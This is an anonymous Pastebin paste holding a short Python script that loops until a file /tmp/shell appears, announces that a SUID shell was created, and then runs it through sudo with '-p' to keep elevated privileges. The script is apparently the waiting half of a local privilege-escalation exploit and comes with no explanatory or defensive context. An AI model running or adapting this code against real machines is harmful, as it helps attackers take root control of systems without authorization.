Guest User

Untitled

a guest
Feb 9th, 2026
54
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.30 KB | None | 0 0
  1. import time
  2. import os
  3. while True:
  4.     try:
  5.         import importlib
  6.     except:
  7.         pass
  8.        
  9.     if os.path.exists("/tmp/shell"):
  10.         print("[+] SUID shell created successfully")
  11.         os.system("sudo /tmp/shell -p")
  12.         break
  13.     time.sleep(1)
Advertisement
Add Comment
Please, Sign In to add comment